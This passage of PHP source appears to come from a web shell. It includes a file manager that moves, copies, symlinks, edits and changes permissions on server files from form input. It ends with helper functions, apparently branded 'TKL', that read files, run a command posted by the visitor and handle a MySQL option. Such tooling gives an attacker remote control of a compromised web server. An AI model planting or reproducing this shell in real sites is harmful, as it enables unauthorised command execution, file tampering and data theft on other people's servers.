$message .= notice('moved', implode("\n", $success), $dest);
}
listing_page($message);
} else {
html_header();
echo '<form action="' . $self . '?tool=Files" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';
request_dump();
echo "\t<b>" . word('move_files') . '</b>
<p>
';
foreach ($files as $file) {
echo "\t" . html($file) . "<br />\n";
}
echo ' </p>
<hr />
' . word('destination') . ':
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
<input type="submit" value="' . word('move') . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
</form>
';
html_footer();
}
break;
case 'copy':
if (!empty($_POST['destination'])) {
$dest = relative2absolute($_POST['destination'], $directory);
if (@is_dir($dest)) {
$failure = array();
$success = array();
foreach ($files as $file) {
$filename = substr($file, strlen($directory));
$d = addslash($dest) . $filename;
if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
$success[] = $file;
} else {
$failure[] = $file;
}
}
$message = '';
if (sizeof($failure) > 0) {
$message = error('not_copied', implode("\n", $failure), $dest);
}
if (sizeof($success) > 0) {
$message .= notice('copied', implode("\n", $success), $dest);
}
listing_page($message);
} else {
if (!@file_exists($dest) && @copy($file, $dest)) {
listing_page(notice('copied', $file, $dest));
} else {
listing_page(error('not_copied', $file, $dest));
}
}
} else {
html_header();
echo '<form action="' . $self . '?tool=Files" method="post">
<table class="dialog">
<tr>
<td class="dialog">
';
request_dump();
echo "\n<b>" . word('copy_files') . '</b>
<p>
';
foreach ($files as $file) {
echo "\t" . html($file) . "<br />\n";
}
echo ' </p>
<hr />
' . word('destination') . ':
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
<input type="submit" value="' . word('copy') . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
</form>
';
html_footer();
}
break;
case 'create_symlink':
if (!empty($_POST['destination'])) {
$dest = relative2absolute($_POST['destination'], $directory);
if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
if (!@file_exists($dest) && @symlink($file, $dest)) {
listing_page(notice('symlinked', $file, $dest));
} else {
listing_page(error('not_symlinked', $file, $dest));
}
} else {
html_header();
echo '<form action="' . $self . '?tool=Files" method="post">
<table class="dialog" id="symlink">
<tr>
<td style="vertical-align: top">' . word('destination') . ': </td>
<td>
<b>' . html($file) . '</b><br />
<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
<label for="checkbox_relative">' . word('relative') . '</label>
<input type="hidden" name="action" value="create_symlink" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
</td>
</tr>
<tr>
<td>' . word('symlink') . ': </td>
<td>
<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
<input type="submit" value="' . word('create_symlink') . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
</form>
';
html_footer();
}
break;
case 'edit':
if (!empty($_POST['save'])) {
$content = str_replace("\r\n", "\n", $_POST['content']);
if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
listing_page(notice('saved', $file));
} else {
listing_page(error('not_saved', $file));
}
} else {
if (@is_readable($file) && @is_writable($file)) {
edit($file);
} else {
listing_page(error('not_edited', $file));
}
}
break;
case 'permission':
if (!empty($_POST['set'])) {
$mode = 0;
if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
if (@chmod($file, $mode)) {
listing_page(notice('permission_set', $file, decoct($mode)));
} else {
listing_page(error('permission_not_set', $file, decoct($mode)));
}
} else {
html_header();
$mode = fileperms($file);
echo '<form action="' . $self . '?tool=Files" method="post">
<table class="dialog">
<tr>
<td class="dialog">
<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
<hr />
<table id="permission">
<tr>
<td></td>
<td style="border-right: 1px solid black">' . word('owner') . '</td>
<td style="border-right: 1px solid black">' . word('group') . '</td>
<td>' . word('other') . '</td>
</tr>
<tr>
<td style="text-align: right">' . word('read') . ':</td>
<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
</tr>
<tr>
<td style="text-align: right">' . word('write') . ':</td>
<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
</tr>
<tr>
<td style="text-align: right">' . word('execute') . ':</td>
<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
</tr>
</table>
<hr />
<input type="submit" name="set" value="' . word('set') . '" />
<input type="hidden" name="action" value="permission" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
</td>
</tr>
</table>
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
</form>
';
html_footer();
}
break;
default:
listing_page();
}
exit;
}
echo '<table width="100%" border="0"><tr><td rowspan="1">';
dirTKL ($dir);
echo '</td><td align="right" valign="bottom" ><textarea rows="15" cols="100" >';
if (!$function_tkl == ''){
readFileTKL ($function_tkl,$pwd);
}
if (!$_POST['command'] == ''){
exTKL ();
}
if ($_POST['function_tkl'] == 'mysql1'){
echo $gaza_file;
}
fotTKL($gaza_text,$gaza_text1,$dir);
?>
Reference in a new issue Copy permalink